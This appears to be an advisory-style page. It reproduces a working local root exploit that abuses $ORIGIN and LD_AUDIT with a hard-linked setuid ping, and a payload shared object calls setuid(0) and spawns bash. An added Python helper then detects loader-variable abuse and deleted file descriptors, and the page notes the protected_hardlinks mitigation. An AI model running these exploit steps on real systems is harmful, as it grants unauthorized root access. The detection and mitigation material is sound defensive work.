Privilege escalation steps:
```shell
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
```
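The session above leaves two artifacts a defender can look for on a host: a dynamic-loader variable (here `LD_AUDIT`) carrying a literal `$ORIGIN` in a process environment, and an open descriptor in `/proc/<pid>/fd` whose target is marked `(deleted)`. The following detection helper is an added example, not part of the original page or of the advisory it reproduces. It parses `/proc/<pid>/environ`-style blobs and `readlink` targets from constructed sample data; the `scan_live_process` helper reads the real `/proc` and is the only part that assumes a Linux host (names such as `assess`, `LOADER_VARS` and the sample values are this example's own).

```python
"""Detect loader-environment abuse and deleted-file descriptors (added example)."""
import os
from typing import Dict, List, Tuple

# Dynamic-loader variables honoured from the environment. None of them should
# appear in the environment of a set-uid process; a literal $ORIGIN in their
# value is the specific pattern shown on this page.
LOADER_VARS = ("LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH")

Finding = Tuple[str, str, str]  # (variable, value, severity)


def parse_environ(blob: bytes) -> Dict[str, str]:
    """Parse a NUL-separated KEY=VALUE blob (the /proc/<pid>/environ format)."""
    env: Dict[str, str] = {}
    for entry in blob.split(b"\0"):
        if not entry:
            continue
        key, _, value = entry.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def suspicious_loader_vars(env: Dict[str, str]) -> List[Finding]:
    """Flag loader variables; $ORIGIN or ${ORIGIN} in the value is rated high."""
    findings: List[Finding] = []
    for var in LOADER_VARS:
        if var not in env:
            continue
        value = env[var]
        if "$ORIGIN" in value or "${ORIGIN}" in value:
            severity = "high"      # loader-expanded token, as in the page's session
        elif var == "LD_AUDIT":
            severity = "high"      # LD_AUDIT is almost never set legitimately
        else:
            severity = "medium"
        findings.append((var, value, severity))
    return findings


def deleted_fds(fd_links: Dict[int, str]) -> List[int]:
    """Return descriptors whose readlink target is marked ' (deleted)'."""
    return sorted(fd for fd, target in fd_links.items()
                  if target.endswith(" (deleted)"))


def assess(environ_blob: bytes, fd_links: Dict[int, str]) -> Dict[str, object]:
    """Combine both checks into one report for a single process."""
    env = parse_environ(environ_blob)
    return {
        "loader_vars": suspicious_loader_vars(env),
        "deleted_fds": deleted_fds(fd_links),
    }


def scan_live_process(pid: int) -> Dict[str, object]:
    """Read a real process from /proc (Linux only; needs permission on the pid)."""
    with open(f"/proc/{pid}/environ", "rb") as fh:
        environ_blob = fh.read()
    fd_dir = f"/proc/{pid}/fd"
    fd_links = {}
    for name in os.listdir(fd_dir):
        try:
            fd_links[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # descriptor closed between listdir and readlink
    return assess(environ_blob, fd_links)


# Constructed sample input mirroring the page's session (not captured data).
SAMPLE_ENVIRON = b"HOME=/home/taviso\0LD_AUDIT=$ORIGIN\0PATH=/usr/bin:/bin\0"
SAMPLE_FDS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0",
              3: "/tmp/exploit/target (deleted)"}

if __name__ == "__main__":
    print(assess(SAMPLE_ENVIRON, SAMPLE_FDS))
```

Neither indicator is proof on its own: deleted-file descriptors are normal for log rotation and for updated libraries, and `LD_PRELOAD` is used by legitimate tooling. The combination of a loader variable on a set-uid process and a deleted descriptor pointing into a world-writable directory is what merits a look. On the prevention side, the hard-link step in the session is blocked on kernels with `fs.protected_hardlinks=1`, which stops unprivileged users from linking files they do not own.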